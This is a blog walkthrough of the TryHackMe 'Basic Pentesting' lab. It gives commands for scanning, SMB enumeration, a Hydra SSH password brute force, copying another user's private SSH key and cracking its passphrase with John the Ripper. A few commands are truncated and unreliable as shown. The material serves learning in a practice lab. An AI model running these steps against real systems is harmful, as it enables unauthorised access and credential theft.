TryHackMe Basic Pentesting Walkthrough

Reading Time: 7 minutes

Tryhackme has many beginner friendly rooms. If you are just starting with the platform, rooms, such as Nmap, or Introductory Researching, is a great start. However, after you’ve nailed the basic tools and methodologies, you should increase difficulty. If you will stay solving same level rooms, you won’t progress that much. Today we are going to cover a room, that is a great challenge for someone who has the basics and wants more challenge. Welcome to the TryHackMe Basic Pentesting walkthrough.

Room Overview

At the time of writing this walkthrough, the room had over 98 000 participants, and it’s about 2.5 years since it was released.

This is a significant number of users. In terms of the popularity, the room compares with other popular beginner friendly rooms, such as Vulnversity. This shows that people find a chance to grow by solving the room challenges.

Let’s take a look what room offers for us.

THM Basic Pentesting has only one, big task

If compared with other THM rooms, Basic Pentesting differs in a way. Instead of different tasks, it has only one – Web App Testing and Privilege Escalation. However, in reality, there are many questions behind this task.

Questions of the Basic Pentesting room

As we can see, there are different questions – that varies from finding what services the host is running, to obtaining passwords, or enumerating information. All of the questions have hints if you are stuck. But if these are not enough, you can always refer to this walkthrough.

However, try solving all of the questions on your own. And only if you are really stuck, seek for the hints.

If you are wondering what does the Basic Pentesting THM room focuses on, these are the things you will learn answering the questions:

  • Brute forcing 
  • Hash cracking 
  • Service, and Linux enumeration

Basic Pentesting Writeup

Let’s move on to the solutions of Basic Pentesting. The first question is not directly related to the room.

Deploy Basic Pentesting machine

It asks you to deploy the victim machine. That can be done easily with the “Start Machine” button. Don’t forget to start an attacker machine at the same time (if you ain’t be using your own machine), as it takes a while to boot.

The second question asks you to “Find the services exposed by the machine“.

Second question asks you to find exposed services

This one is simple – first of all we should make a Nmap scan. Having the basic information we will then be able to determine different services that the machine has. The following command with Nmap version detection and script usage will do the work:

nmap -v -sC -sV IP_ADDRESS

As a result, you should see that there are different ports open: 22, 80, 139, 445, 8009, and 8080.

Nmap scan results

One of the things that interests us, is the Apache webserver and a website. We can visit it by our browser.

Web page of the Basic Pentesting

However, there is nothing we can do with this. Inspecting the page source is also not fruitful – there is only a mysterious note:

Note in the page HTML

Let’s leave it at the moment, and let’s continue with the third question. It asks us “What is the name of the hidden directory on the web server (enter name without/)?”

Third question of the room

As we do need to investigate what is the hidden directory on the webserver, we can use the GoBuster as our weapon of choice. And we already know on which port there is a website.

gobuster dir -u IP_ADDRESS -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

As a result you will see that there is a one page that has a status of 301 – /development. And this is the answer to the question.

The directory listing contains two interesting text files:

Contents of teh development pge

Content of the dev.txt file has some kind of logs, that prompts us that the SMB is configured.

Dev.txt file contains some kind of logs

And the other one, j.txt, contains a note that warns that the password, other user uses, is unsafe and can be easily cracked.

Contents of the j.txt file

The fourth question, asks us to bruteforce the username and the password.

Fourth question asks to brute force

However, we do know that the SMB is used, so before that we might try enumerating it. In this way we might find username without making an exhausting brute force attack. We can use enum4linux script for this purpose:

enum4linux -a IP_ADDRESS

After command had executed, bingo! We do have two usernames: Kay, and Jan.

Usernames were found on SMB

The following questions asks for username and a password. Because there are two potential candidates, we don’t know yet which one is needed, right? Wrong. Remember the note left by “K” to the “J” telling that “J” has a weak and easily crackable password? Let’s try bruteforcing it.

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP_ADDRESS

This command will try to brute force Jan’s password of SSH service by trying words from the rockyou.txt wordlist. The Hydra might take a while, especially if you are using TryHackMe attacker’s box, but finally… bingo.

We have successfully bruteforced password of user "jan"

We have successfully managed to bruteforce password for user “jan”. Now you can enter “jan” as an answer to the fifth question “What is the username?”, and bruteforced password as the answer to the sixth question “What is the password?”.

Answers to the questions

As we do know the credentials logging in to the SSH service, we can login:

ssh jan@IP_ADDRESS

Enter the password, and we are in.

Logged in to the SSH service

We can immediately answer to the seventh question, as the SSH service was used to access the server.

We used SSH to access the server, so the answer is SSH

The eighth question asks to find a way to escalate privileges.

In order to finish the task, we have to escalate privileges

To find a way how to do it, we will use the LinPeas – Linux Privilege Escalation Awesome Script. Let’s download it to the GitHub repository to our machine:

curl -L >

And now, copy it to the victim machine:

cp jan@IP_ADDRESS:/tmp

We can’t copy it directly to the /home/jan directory – we would get a “Permission denied” error. But instead we can write to the tmp directory. After that. connect to the SSH service as a Jan, and run the script:

sh /tmp/

LinPeas had identified that there is user’s Kay password inside the home directory.

Private SSH key was found

We can retrieve it to our host machine:

scp jan@IP_ADDRESS:/home/kay/.ssh/id_rsa .

Before trying to login, we have to set the private key file permissions properly.

chmod 600 id_rsa

Now we can try to login as Kay:

Passphrase is asked for the user Kay

Unfortunately, we can see that it has a passphrase set. We will have to brute force it, and we will use John The Ripper for it. But before that, we have to convert the SSH key to understandable, for John, format.

python /opt/john/ id_rsa > johnformat.txt

If want to use the Ssh2john without providing full path, and you get the “Command not found” error, refer to my other article how you can solve this problem.

As a result, file called johformat.txt should be created. Inside there should be a hash that we will use with John.

john --wordlist=/usr/share/wordlists/rockyou.txt johnformat.txt

As a result, the password should be brute forced in a minute.

Password for the Kay

As we do know another user, we can answer to the ninth question – “What is the name of the other user you found (all lower case)?. It’s Kay.

Other user we found is Kay

The tenth question asks us what can we do with a username and password. And the obvious answer is this – login and see what files the user has. Let’s login with the private SSH key and passphrase.

We can see that there is a file called pass.bak. After checking what’s inside, we can see that there is a flag.

Kay home directory has pass.bak file

And now we have answer to the eleventh question of the TryHackMe Basic Pentesting room!

Final Words

If you have some ethical hacking skills, and know how to use main tools, this room is a perfect challenge for you. However, even if you are a complete beginner, the room is beneficial for you, as you will learn a lot along the way. And even if you are an advanced penetration tester, great new is that this room is interesting, and you won’t get bored doing the tasks.

That’s it, I hope that my TryHackMe Basic Pentesting walkthrough was helpful for you and you’ve managed to solve the tasks.

Keep Hacking!

Leave a Comment